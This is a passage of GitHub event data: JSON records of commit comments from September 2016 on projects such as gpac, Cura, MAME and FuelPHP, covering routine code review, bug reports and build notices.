{"id":"4616932231","type":"CommitCommentEvent","actor":{"login":"guirenard"},"repo":{"name":"nuxeo/nuxeo-drive-server"},"payload":{"comment":{"id":19170109,"position":9,"line":9,"path":"nuxeo-drive-web-ui/src/main/resources/OSGI-INF/nuxeodrive-webresources-contrib.xml","commit_id":"804e36b0bcacd06986c7e2c37c2a2ca4fa8ddb2f","created_at":"2016-09-26T10:20:48Z","updated_at":"2016-09-26T10:20:48Z","body":"Detail: should be simply <uri>ui/nuxeo-drive/nuxeo-drive.html</uri> else the app will resolve a double slash host:port//ui/nuxeo-drive/nuxeo-drive.html or need to change https://github.com/nuxeo/nuxeo-web-ui/blob/master/app/index.html#L107"}},"created_at":"2016-09-26T10:20:48Z"}
{"id":"4616933801","type":"CommitCommentEvent","actor":{"login":"vyky"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19170117,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-26T10:21:08Z","updated_at":"2016-09-26T10:21:08Z","body":"I'm getting the same error as @subratpanda1 \r\n\r\nI'm sorry but this hack affect more bad then good. Please consider revert back."}},"created_at":"2016-09-26T10:21:08Z"}
{"id":"4616942764","type":"CommitCommentEvent","actor":{"login":"geramy92"},"repo":{"name":"TerraTex-Community/TerraTex-Reallife-Reloaded"},"payload":{"comment":{"id":19170132,"position":null,"line":null,"path":null,"commit_id":"1af2506d7c36434a2e7640f9b70047ea27fe38e1","created_at":"2016-09-26T10:23:11Z","updated_at":"2016-09-26T10:23:11Z","body":"so siehts aus, wenn ein syntaxfehler im file ist, kann es ja auch nicht compiled werden"}},"created_at":"2016-09-26T10:23:11Z"}
{"id":"4616943652","type":"CommitCommentEvent","actor":{"login":"RodolpheFouquet"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19170134,"position":null,"line":null,"path":null,"commit_id":"4f7e356fd33faa8c08b6dd41e8a98f2c8a6e79a8","created_at":"2016-09-26T10:23:22Z","updated_at":"2016-09-26T10:23:22Z","body":"cf: https://github.com/gpac/gpac/commit/939e436cf88cdffd92b94bea7eb1f4a51247187b"}},"created_at":"2016-09-26T10:23:22Z"}
{"id":"4616944492","type":"CommitCommentEvent","actor":{"login":"sagark"},"repo":{"name":"sagark/riscv-qemu-upstream"},"payload":{"comment":{"id":19170135,"position":415,"line":415,"path":"target-riscv/cpu.h","commit_id":"32f8aae0e03be240d782f455e1dfa63da4c54751","created_at":"2016-09-26T10:23:33Z","updated_at":"2016-09-26T10:23:33Z","body":"Thanks, I made all the fixes you suggested and pushed a new patch set to \r\nhttps://github.com/sagark/riscv-qemu-upstream2"}},"created_at":"2016-09-26T10:23:33Z"}
{"id":"4616945656","type":"CommitCommentEvent","actor":{"login":"KiberInfinity"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19170137,"position":null,"line":null,"path":null,"commit_id":"8a4a8a30358e958b3cf93a957730829fd1b8d1fc","created_at":"2016-09-26T10:23:49Z","updated_at":"2016-09-26T10:23:49Z","body":"На странице техподдержки есть скрытый блок с аудиозаписью + его оригинальная копия, но в виде сырого хтмл в js-коде. \r\nпри написании коммента/создании таска на сервер уходит сырой html из js'а, и innerHTML блока где было аудио.\r\nЕсли стоят расширения для вк, то код элемента будет изменён (кнопки скачивания и т.д)\r\nВ итоге представители тех.поддержки будут требовать удалить \"вредоносные расширения\" + возможно впарят cezurity"}},"created_at":"2016-09-26T10:23:49Z"}
{"id":"4616950054","type":"CommitCommentEvent","actor":{"login":"rbouqueau"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19170150,"position":16,"line":3314,"path":"applications/mp4box/main.c","commit_id":"a2977a85cba372d659a1a154fe7c132a166ff9a8","created_at":"2016-09-26T10:24:51Z","updated_at":"2016-09-26T10:24:51Z","body":"Thanks :)\r\nIn this case, mpu_asset_id_value should be allocated as max_strlen+1 because of the '\\0' terminating char. In general we may want to check about the length of the user input. Does it make sense?"}},"created_at":"2016-09-26T10:24:51Z"}
{"id":"4616950727","type":"CommitCommentEvent","actor":{"login":"transmitterdan"},"repo":{"name":"OpenCPN/OpenCPN"},"payload":{"comment":{"id":19170154,"position":null,"line":null,"path":null,"commit_id":"511d024854cc6b146462bf0af0cb985a4d5060ee","created_at":"2016-09-26T10:25:01Z","updated_at":"2016-09-26T10:25:01Z","body":"On Windows 10 the spinner can still get stuck constantly spinning."}},"created_at":"2016-09-26T10:25:01Z"}
{"id":"4616956523","type":"CommitCommentEvent","actor":{"login":"kirill-konshin"},"repo":{"name":"ringcentral/ringcentral-js"},"payload":{"comment":{"id":19170165,"position":121,"line":121,"path":"src/core/Utils.js","commit_id":"6fb932581eda2d0296a9dee966a298fda28655ff","created_at":"2016-09-26T10:26:21Z","updated_at":"2016-09-26T10:26:21Z","body":"A PR with better check is welcome"}},"created_at":"2016-09-26T10:26:21Z"}
{"id":"4616959627","type":"CommitCommentEvent","actor":{"login":"excellenthee"},"repo":{"name":"excellenthee/excellent-class"},"payload":{"comment":{"id":19170171,"position":null,"line":null,"path":null,"commit_id":"88277655f30efe06e190cefeb563286aa7f2822f","created_at":"2016-09-26T10:27:03Z","updated_at":"2016-09-26T10:27:03Z","body":"test"}},"created_at":"2016-09-26T10:27:03Z"}
{"id":"4616960782","type":"CommitCommentEvent","actor":{"login":"devopstechnologies"},"repo":{"name":"devopstechnologies/Git"},"payload":{"comment":{"id":19170178,"position":2,"line":2,"path":"production.txt","commit_id":"ef976e9c664f5e28870c1d2a881e115c772e651f","created_at":"2016-09-26T10:27:19Z","updated_at":"2016-09-26T10:27:19Z","body":"this is error\r\n"}},"created_at":"2016-09-26T10:27:19Z"}
{"id":"4616963020","type":"CommitCommentEvent","actor":{"login":"AMDmi3"},"repo":{"name":"AMDmi3/ja2-stracciatella"},"payload":{"comment":{"id":19170182,"position":5,"line":51,"path":"configure","commit_id":"d44b458a635b345becd4e440b1e3bcba010285e3","created_at":"2016-09-26T10:27:50Z","updated_at":"2016-09-26T10:27:50Z","body":"Hmm, I have absolutely no idea why I didn't do it in the first place, but it's outdated now as you've switched to CMake which is even better than fixing Makefile. FreeBSD port o ja2-stracciatella is still at 0.14.1, I'll try to bump it up to latest version and see if it needs any fixes which could be upstreamed."}},"created_at":"2016-09-26T10:27:50Z"}
{"id":"4616964064","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19170185,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-26T10:28:05Z","updated_at":"2016-09-26T10:28:05Z","body":"#DEFINE arrange\r\n:)\r\n\r\nI've tested it on my Solo² as client to my quadbox. Quadbox has only one port for streaming and would need additional parameters for transcoding.\r\nThe other way around is bad because Solo² transcodes badly. Can't use the Vu+ Duo² for that either.\r\n\r\nI've tested by zapping between multiple remote channels and zapping between remote and local channels.\r\nZapping between remote channels worked with the old version already but streaming hung when zapping from a remote to a local channel and then back to a remote channel.\r\n"}},"created_at":"2016-09-26T10:28:05Z"}
{"id":"4616966840","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19170189,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-26T10:28:41Z","updated_at":"2016-09-26T10:28:41Z","body":"BTW: I'm too lazy to write all this in English. Can we continue this in the forum? :)\r\n"}},"created_at":"2016-09-26T10:28:41Z"}
{"id":"4616969298","type":"CommitCommentEvent","actor":{"login":"dirvine"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19170197,"position":13,"line":13,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-26T10:29:13Z","updated_at":"2016-09-26T10:29:13Z","body":"Possibly worth mentioning that the locked data chains will also be required to protect against key reuse etc. https://github.com/maidsafe/rfcs/pull/177/files"}},"created_at":"2016-09-26T10:29:13Z"}
{"id":"4616972864","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19170206,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-26T10:30:04Z","updated_at":"2016-09-26T10:30:04Z","body":"sure"}},"created_at":"2016-09-26T10:30:04Z"}
{"id":"4616974165","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19170207,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-26T10:30:21Z","updated_at":"2016-09-26T10:30:21Z","body":"Or on. English has strange prepositions sometimes :)"}},"created_at":"2016-09-26T10:30:21Z"}
{"id":"4616981332","type":"CommitCommentEvent","actor":{"login":"dirvine"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19170217,"position":15,"line":15,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-26T10:31:58Z","updated_at":"2016-09-26T10:31:58Z","body":"Worth adding a wiki page to explain merkle tree here https://en.wikipedia.org/wiki/Merkle_tree"}},"created_at":"2016-09-26T10:31:58Z"}
{"id":"4616981550","type":"CommitCommentEvent","actor":{"login":"dirvine"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19170218,"position":26,"line":26,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-26T10:32:01Z","updated_at":"2016-09-26T10:32:01Z","body":"We can possibly expand this to show that the merkle tree of checkpoints may be enough. If a node sends the branch of the tree since the checkpoint (link blocks only) then it can verify the nodes group cryptographically. "}},"created_at":"2016-09-26T10:32:01Z"}
{"id":"4616983286","type":"CommitCommentEvent","actor":{"login":"simonepigazzini"},"repo":{"name":"simonepigazzini/H4Analysis"},"payload":{"comment":{"id":19170222,"position":null,"line":null,"path":null,"commit_id":"04b407adc47bffd7feee713f5dac8cda704ebcb0","created_at":"2016-09-26T10:32:25Z","updated_at":"2016-09-26T10:32:25Z","body":"@michelif @pmeridian : ma vogliamo veramente sta cosa dell'offset? ora ne ho preso uno che avete messo voi ma cmq Y vs X non è centrato in (0, 0)..."}},"created_at":"2016-09-26T10:32:25Z"}
{"id":"4616983457","type":"CommitCommentEvent","actor":{"login":"it-can"},"repo":{"name":"fuel/core"},"payload":{"comment":{"id":19170223,"position":null,"line":null,"path":null,"commit_id":"90c357e93911278c610c3c7f7aca7156aebab359","created_at":"2016-09-26T10:32:28Z","updated_at":"2016-09-26T10:32:28Z","body":"I am getting these errors now with ajax requests\r\n\r\n```\r\nFatal error: Uncaught exception 'DomainException' with message 'Don't know how to parse input of type: application/x-www-form-urlencoded; charset=UTF-8' in /home/test/public_html/fuel/core/classes/input/instance.php:481 Stack trace: #0 /home/test/public_html/fuel/core/classes/input/instance.php(100): Fuel\\Core\\Input_Instance->hydrate() #1 /home/test/public_html/fuel/core/classes/input.php(49): Fuel\\Core\\Input_Instance->__construct() #2 /home/test/public_html/fuel/core/classes/input.php(67): Fuel\\Core\\Input::forge() #3 /home/test/public_html/fuel/core/classes/input.php(75): Fuel\\Core\\Input::instance() #4 /home/test/public_html/fuel/core/classes/session/driver.php(501): Fuel\\Core\\Input::__callStatic('post', Array) #5 /home/test/public_html/fuel/core/classes/session/driver.php(501): Fuel\\Core\\Input::post('', false) #6 /home/test/public_html/fuel/core/classes/session/file.php(74): Fuel\\Core\\Session_Driver->_get_cookie() #7 /home/test/public_html/fuel/core/classes/session.php(171): Fuel\\Core in /home/test/public_html/fuel/core/classes/input/instance.php on line 481\r\n```"}},"created_at":"2016-09-26T10:32:28Z"}
{"id":"4616983661","type":"CommitCommentEvent","actor":{"login":"ReapOmen"},"repo":{"name":"ReapOmen/open-media"},"payload":{"comment":{"id":19170225,"position":17,"line":106,"path":"openmedia/gui/frames.py","commit_id":"2d8476d4d83aa14a686b3d7beea1f950fadf6611","created_at":"2016-09-26T10:32:31Z","updated_at":"2016-09-26T10:32:31Z","body":"What are you actually checking here? If `mixer` has the attribute `track_count`? Or do you check if the value is greater than 0?"}},"created_at":"2016-09-26T10:32:31Z"}
{"id":"4616987403","type":"CommitCommentEvent","actor":{"login":"mnapoli"},"repo":{"name":"mnapoli/IsItMaintained"},"payload":{"comment":{"id":19170233,"position":null,"line":null,"path":null,"commit_id":"9c71c18c756d2b7e3613e144a871deeb7d3e3a12","created_at":"2016-09-26T10:33:26Z","updated_at":"2016-09-26T10:33:26Z","body":"They all were feature requests and for this project I'm not doing them (I'm satisfied with the current website and I don't have time) so I only accept pull requests"}},"created_at":"2016-09-26T10:33:26Z"}
{"id":"4616995980","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19170252,"position":16,"line":104,"path":"cura/BuildVolume.py","commit_id":"1cc5d699c4d735cacd4c9a22e11a40ce1c04b05a","created_at":"2016-09-26T10:35:26Z","updated_at":"2016-09-26T10:35:26Z","body":"I think this is the wrong signal to listen to. What if prime tower is a setting that gets defined by the material profile, later on, instead of quality? What if the user saves the prime_tower_enable to a quality_changes profile?\r\n\r\nWe should probably listen to all extruder stacks (as well as the global stack). Can you see if that fixes it also?"}},"created_at":"2016-09-26T10:35:26Z"}
{"id":"4616997789","type":"CommitCommentEvent","actor":{"login":"Mohammad0937"},"repo":{"name":"unixpickle/kahoot-hack"},"payload":{"comment":{"id":19170255,"position":10,"line":11,"path":"kahoot-crash/main.go","commit_id":"43451045f7da61e872deabcea987e108419f20c9","created_at":"2016-09-26T10:35:53Z","updated_at":"2016-09-26T10:35:53Z","body":"233423\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-26T10:35:53Z"}
{"id":"4617000137","type":"CommitCommentEvent","actor":{"login":"Lizzka"},"repo":{"name":"Harroway/SS13"},"payload":{"comment":{"id":19170257,"position":null,"line":null,"path":null,"commit_id":"4aac2c00f308cb84a748ea0ea036e1c4234dd68a","created_at":"2016-09-26T10:36:26Z","updated_at":"2016-09-26T10:36:26Z","body":"Фикс Декиного кривого расположения файла с расой\r\nПодробнее:\r\nПеремещение файла slime.dm из \\harroway\\code\\station\\ в \\harroway\\code\\modules\\mob\\living\\carbon\\human\\species\\station\\"}},"created_at":"2016-09-26T10:36:26Z"}
{"id":"4617001740","type":"CommitCommentEvent","actor":{"login":"glamarca"},"repo":{"name":"uclouvain/osis"},"payload":{"comment":{"id":19170260,"position":14,"line":53,"path":"base/tests/models/test_models_signals.py","commit_id":"0fe68981c2dbff18ba8584464cddc2496e250b8c","created_at":"2016-09-26T10:36:48Z","updated_at":"2016-09-26T10:36:48Z","body":"J'avais pas fait attention, mais en tout cas je n'ai pas d'erreur!\r\nPeut-être fait-il un cast automatique (vu que le typage est dynamique)?\r\nJe vais faire un ou deux tests et je te dis ce qu'il en est."}},"created_at":"2016-09-26T10:36:48Z"}
{"id":"4617004153","type":"CommitCommentEvent","actor":{"login":"varun-k2"},"repo":{"name":"posabsolute/jQuery-Validation-Engine"},"payload":{"comment":{"id":19170265,"position":null,"line":null,"path":null,"commit_id":"863793cb3697d3778554ab415e38e38374ce7cb3","created_at":"2016-09-26T10:37:23Z","updated_at":"2016-09-26T10:37:23Z","body":"Hi @aslam558\r\n$('#selectid).on('change',function(){\r\n$(this).validationEngine('hide');});"}},"created_at":"2016-09-26T10:37:23Z"}
{"id":"4617008946","type":"CommitCommentEvent","actor":{"login":"michelif"},"repo":{"name":"simonepigazzini/H4Analysis"},"payload":{"comment":{"id":19170269,"position":null,"line":null,"path":null,"commit_id":"04b407adc47bffd7feee713f5dac8cda704ebcb0","created_at":"2016-09-26T10:38:28Z","updated_at":"2016-09-26T10:38:28Z","body":"beh ma  devi prima derivarlo l'offset. \r\nper la Y in genere non fa molto ma per la X fa un sacco di differenza, i due hodo sono abbastanza sfalsati. per i run del cef3 di scorsa estate viene centrato. "}},"created_at":"2016-09-26T10:38:28Z"}
{"id":"4617012204","type":"CommitCommentEvent","actor":{"login":"lrytz"},"repo":{"name":"scala-js/scala-js"},"payload":{"comment":{"id":19170273,"position":19,"line":2305,"path":"compiler/src/main/scala/org/scalajs/core/compiler/GenJSCode.scala","commit_id":"5c5eb2bc6ce8b8fee87a1fae9bce30e3b88520b5","created_at":"2016-09-26T10:39:14Z","updated_at":"2016-09-26T10:39:14Z","body":"looks like `sym.isMixinConstructor`"}},"created_at":"2016-09-26T10:39:14Z"}
{"id":"4617014462","type":"CommitCommentEvent","actor":{"login":"pexcn"},"repo":{"name":"pexcn/SimpleUtils"},"payload":{"comment":{"id":19170278,"position":null,"line":null,"path":null,"commit_id":"0cf0083bf25e5284dfc4b66f6f8e1ed74e2553a9","created_at":"2016-09-26T10:39:48Z","updated_at":"2016-09-26T10:39:48Z","body":"@aa65535 不，我可能描述错了，其实我是希望在任何地方使用 `ContextUtils.get()` 的时候，返回当前的 Activity 的 Context, 如果从当前 Activity 跳转到另一个 Activity, 则当前 Context 是另一个 Activity 的 Context."}},"created_at":"2016-09-26T10:39:48Z"}
{"id":"4617016934","type":"CommitCommentEvent","actor":{"login":"iou402"},"repo":{"name":"swoole/swoole-src"},"payload":{"comment":{"id":19170281,"position":null,"line":null,"path":null,"commit_id":"131d0edac74a929657a0062a784a2c4e39e5656a","created_at":"2016-09-26T10:40:22Z","updated_at":"2016-09-26T10:40:22Z","body":"为什么最小值要修改成2的10次方 ，如果行数少的， 这样不是浪费内存吗？"}},"created_at":"2016-09-26T10:40:22Z"}
{"id":"4617017630","type":"CommitCommentEvent","actor":{"login":"h-2-0"},"repo":{"name":"osteenbergen/slackify"},"payload":{"comment":{"id":19170284,"position":null,"line":null,"path":null,"commit_id":"d2dbf34a4558e204db6c45db8bdec88a4484b18e","created_at":"2016-09-26T10:40:33Z","updated_at":"2016-09-26T10:40:33Z","body":"Thanks, @osteenbergen \r\n\r\nWay better than my hackish bash scripts to kill and restart the slackbot script! I understand the parts about the dispatcher and the list_to. What baffles me is the slackify.client.reconnect(). It is not clear to me if it comes from you, slackbot or the officlal slack API. I will have a look at it. THanks!"}},"created_at":"2016-09-26T10:40:33Z"}
{"id":"4617018212","type":"CommitCommentEvent","actor":{"login":"djmattyg007"},"repo":{"name":"philippkueng/heroku-buildpack-sassc"},"payload":{"comment":{"id":19170285,"position":null,"line":null,"path":null,"commit_id":"5c6bc412903cf0c9b9c86fdab143f17ea8320c44","created_at":"2016-09-26T10:40:40Z","updated_at":"2016-09-26T10:40:40Z","body":"I'd love to be able to merge this upstream, but I'd need to know how the `export` file you create works. Is this something that is automatically read by Heroku when a buildpack is being compiled, or do you have to read this file yourself in other buildpacks?"}},"created_at":"2016-09-26T10:40:40Z"}
{"id":"4617019643","type":"CommitCommentEvent","actor":{"login":"wdm78"},"repo":{"name":"alces-software/flight-appliance-docs"},"payload":{"comment":{"id":19170286,"position":null,"line":null,"path":null,"commit_id":"fa489dbb0aceb639aab482befbe6723b21750d87","created_at":"2016-09-26T10:41:00Z","updated_at":"2016-09-26T10:41:00Z","body":"Looks good to me - thanks!"}},"created_at":"2016-09-26T10:41:00Z"}
{"id":"4617021290","type":"CommitCommentEvent","actor":{"login":"pexcn"},"repo":{"name":"pexcn/SimpleUtils"},"payload":{"comment":{"id":19170292,"position":24,"line":58,"path":"simpleutils/src/main/java/me/pexcn/simpleutils/base/AbsBaseActivity.java","commit_id":"0cf0083bf25e5284dfc4b66f6f8e1ed74e2553a9","created_at":"2016-09-26T10:41:22Z","updated_at":"2016-09-26T10:41:22Z","body":"忘了添加\r\n\r\n````java\r\n@Override\r\n protected void onRestart() {\r\n      ContextUtils.set(this);\r\n      super.onRestart();\r\n }\r\n```\r\n"}},"created_at":"2016-09-26T10:41:22Z"}
{"id":"4617023759","type":"CommitCommentEvent","actor":{"login":"gabi-250"},"repo":{"name":"ReapOmen/open-media"},"payload":{"comment":{"id":19170303,"position":17,"line":106,"path":"openmedia/gui/frames.py","commit_id":"2d8476d4d83aa14a686b3d7beea1f950fadf6611","created_at":"2016-09-26T10:41:57Z","updated_at":"2016-09-26T10:41:57Z","body":"If the value is not 0 (if there are any tracks)."}},"created_at":"2016-09-26T10:41:57Z"}
{"id":"4617029445","type":"CommitCommentEvent","actor":{"login":"ioannad"},"repo":{"name":"ioannad/experiments"},"payload":{"comment":{"id":19170311,"position":53,"line":56,"path":"rpiOS/K9OS/k9os.c","commit_id":"dab4692eedcefd23f5acb07591d03878ce776c42","created_at":"2016-09-26T10:43:16Z","updated_at":"2016-09-26T10:43:16Z","body":">  For more information \"/msg candide ub\" on irc.freenode.org.\r\n\r\nThank you!! Candide seems a treasurebox of good information, top tip! \r\n\r\n> The reason for why many would consider this nitpicking is that the \r\n> address of the first element of an array, and the address of the array\r\n> itself are identical (since the array obviously begins where its first\r\n> element begins).\r\n\r\nI guess the type distinction is a good solution, without resorting to funny pointers in completely different parts of the memory (hmm.. i also think i can draw better what i mean here, than explain it in a comment).\r\n\r\n> No, I really meant *(foo + bar) (and \"sizeof-foo\" is a syntax error :P).\r\n> The important thing here is that this + is not integer addition, it's\r\n> pointer arithmetic. It knows how much to add to the memory address so\r\n> as to advance the pointer far enough to point to bar elements farther\r\n> than it used to point.\r\n\r\nOk, thanks, I really have to get used to this, especially when it comes to commutativity of + in *(a+b).. So C has a special pointer type and it knows which one of a, b is a pointer and which is a number, though they are both represented by int. \r\n\r\n>>    (1<<16)\r\n\r\n> Good shift. This is pretty readable since you want to set bit 16,\r\n> so it's nice having an actual 16 there.\r\n\r\n>>  gpio[0x1c>>2]\r\n\r\n> Bad shift :). I mean, people will understand it, but for clarity\r\n> I'd rather say 0x1c/4. You want to divide by 4, so divide by 4. \r\n\r\nHehe, ok, maybe I got a bit carried away with the [bit twiddling](http://graphics.stanford.edu/~seander/bithacks.html), but there is also a 16 in `pow(2,16)` ;)\r\nAlthough, fair enough, there is no 4 in `0x1c >> 2`.\r\n\r\nCheers, ioa"}},"created_at":"2016-09-26T10:43:16Z"}
{"id":"4617034534","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19170330,"position":null,"line":null,"path":null,"commit_id":"96a97f9b8691ae365b86c0516b23b9f6de9d464a","created_at":"2016-09-26T10:44:26Z","updated_at":"2016-09-26T10:44:26Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1160](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14231&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-26T10:44:26Z"}
{"id":"4617036018","type":"CommitCommentEvent","actor":{"login":"SydOps"},"repo":{"name":"lenfree/awsLaCapa"},"payload":{"comment":{"id":19170332,"position":4,"line":7,"path":".gitignore","commit_id":"8757389e544c5864db12d60ad2502df954fa766b","created_at":"2016-09-26T10:44:47Z","updated_at":"2016-09-26T10:44:47Z","body":"Have problem with it:  \r\n\r\n    Can't read swagger JSON from http://localhost:8081/swagger/swagger.json"}},"created_at":"2016-09-26T10:44:47Z"}
{"id":"4617043987","type":"CommitCommentEvent","actor":{"login":"nickson104"},"repo":{"name":"nickson104/PokemonTCGMaster"},"payload":{"comment":{"id":19170348,"position":null,"line":null,"path":null,"commit_id":"327429a6c200ac804bade33e3b71ce51366083b3","created_at":"2016-09-26T10:46:38Z","updated_at":"2016-09-26T10:46:38Z","body":"test stuff"}},"created_at":"2016-09-26T10:46:38Z"}
{"id":"4617044282","type":"CommitCommentEvent","actor":{"login":"enoch85"},"repo":{"name":"ezraholm50/Spreed-auto"},"payload":{"comment":{"id":19170349,"position":null,"line":null,"path":null,"commit_id":"4a8e481fc7c510799ff81f82ab25dcdb3c3a9dd8","created_at":"2016-09-26T10:46:42Z","updated_at":"2016-09-26T10:46:42Z","body":"This is the fixes I meant just looking at quickly, good progress here!"}},"created_at":"2016-09-26T10:46:42Z"}
{"id":"4617047418","type":"CommitCommentEvent","actor":{"login":"lightda104530"},"repo":{"name":"lightda104530/BetaTester"},"payload":{"comment":{"id":19170357,"position":null,"line":null,"path":null,"commit_id":"5efc92cd1405bd35255a3b8eb8711effa19fd287","created_at":"2016-09-26T10:47:24Z","updated_at":"2016-09-26T10:47:24Z","body":"封包不同,好像不行"}},"created_at":"2016-09-26T10:47:24Z"}
{"id":"4617050028","type":"CommitCommentEvent","actor":{"login":"cuboideum"},"repo":{"name":"RDFBones/FrSexEst"},"payload":{"comment":{"id":19170362,"position":174,"line":662,"path":"ExtensionFrSexEst.owl","commit_id":"f7e548fd3e4d9557ab13df1a0e3f01ddcd7f7ee3","created_at":"2016-09-26T10:48:00Z","updated_at":"2016-09-26T10:48:00Z","body":"The study design should be declared part of investigation planning (OBI_0000339), not of the investigation type (OBI_0000066). The mistake probably arose because of a mistake on RDFBones-O wiki page [Investigation planning](https://github.com/RDFBones/RDFBones-O/wiki/Investigation-planning#general-structure) where the planning class was erroneously labelled in the network graph."}},"created_at":"2016-09-26T10:48:00Z"}
{"id":"4617055123","type":"CommitCommentEvent","actor":{"login":"danielwegener"},"repo":{"name":"fabric8io/docker-maven-plugin"},"payload":{"comment":{"id":19170368,"position":null,"line":null,"path":null,"commit_id":"c81bfcdadbfcf4de2af3a4ee65a36cb2a3a8f3ba","created_at":"2016-09-26T10:49:08Z","updated_at":"2016-09-26T10:49:08Z","body":"Hi @rhuss , thanks for the quick fix. Unfortunately I think this is not enough because `io.fabric8.maven.docker.access.hc.ApacheHttpClientDelegate#getResponseMessage` will return a non-null string even if the response code is 404. I am not sure what docker is responding there, but it seem to have a http-response-entity that is not json."}},"created_at":"2016-09-26T10:49:08Z"}
{"id":"4617057617","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":19170371,"position":30,"line":69,"path":"app/scripts/controllers/clients-controller.js","commit_id":"c255bdb4c87e36095101c1c5c6cae9a1554b6710","created_at":"2016-09-26T10:49:43Z","updated_at":"2016-09-26T10:49:43Z","body":"xq no un filter normal? tampoco me gusta eso de `[0]` @macool q devuelve el backend aquí? el cliente eliminado?"}},"created_at":"2016-09-26T10:49:43Z"}
{"id":"4617061070","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19170377,"position":16,"line":104,"path":"cura/BuildVolume.py","commit_id":"1cc5d699c4d735cacd4c9a22e11a40ce1c04b05a","created_at":"2016-09-26T10:50:28Z","updated_at":"2016-09-26T10:50:28Z","body":"That would be ```Application.getInstance().getMachineManager().activeStackChanged```"}},"created_at":"2016-09-26T10:50:28Z"}
{"id":"4617070572","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":19170394,"position":30,"line":69,"path":"app/scripts/controllers/clients-controller.js","commit_id":"c255bdb4c87e36095101c1c5c6cae9a1554b6710","created_at":"2016-09-26T10:52:40Z","updated_at":"2016-09-26T10:52:40Z","body":"este es el edit... de todas maneras, a este método de edit le llega como parámetro el objeto a editar, y la promesa retorna el objeto editado, xq no pones directamente `objetoParámetro = objetoResponse` y ya?"}},"created_at":"2016-09-26T10:52:40Z"}
{"id":"4617070881","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/paragon.addons"},"payload":{"comment":{"id":19170395,"position":null,"line":null,"path":null,"commit_id":"79935087e37dfbdf1595a26f353e9491d91661c5","created_at":"2016-09-26T10:52:45Z","updated_at":"2016-09-26T10:52:45Z","body":"@malemburg you need to sign Plone Contributor Agreement in order to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html"}},"created_at":"2016-09-26T10:52:45Z"}
{"id":"4617072848","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":19170399,"position":57,"line":92,"path":"app/scripts/controllers/clients-controller.js","commit_id":"c255bdb4c87e36095101c1c5c6cae9a1554b6710","created_at":"2016-09-26T10:53:12Z","updated_at":"2016-09-26T10:53:12Z","body":"aquí es donde sería de saber q devuelve el backend @macool "}},"created_at":"2016-09-26T10:53:12Z"}
{"id":"4617074304","type":"CommitCommentEvent","actor":{"login":"ImJezze"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":19170403,"position":null,"line":null,"path":null,"commit_id":"161a08dd4acd792c71d665d3abc16c3093053de8","created_at":"2016-09-26T10:53:31Z","updated_at":"2016-09-26T10:53:31Z","body":"Hi Calamity,\n\nI think I could fix the second issue. The target texture created by HLSL\nand BGFX was too small when -intoverscan is used. But I'll wait with the\npush till the next version of MAME has been released, because we're already\nin the stabilization phase.\n\nThe first issue is hard to explain, so I've added some screenshots to\nillustrate what's happening.\n\ne.g. tengai -window -video gdi -keepaspect -autostretchxy -intoverscan\n\nThe aspect ratio is set to 4:3, all other core render options are set to 0.\n\n\n​x-axis: fractional scaled\ny-axis: integer scaled\ntop-window: 447 x 335\ntop-image: 299 x 224 (4:3)\nbottom-window: 446 x 335\nbottom-image: 446 x 224 (broken aspect ratio, width stretched)\n\nHere is another example with the same settings.\n\n\nx-axis: fractional scaled\ny-axis: integer scaled\n​top-window: 597 x 448\ntop-image: 597 x 448 (4:3)\nmiddle-window: 480x448\nmiddle image: 480x448 (broken aspect 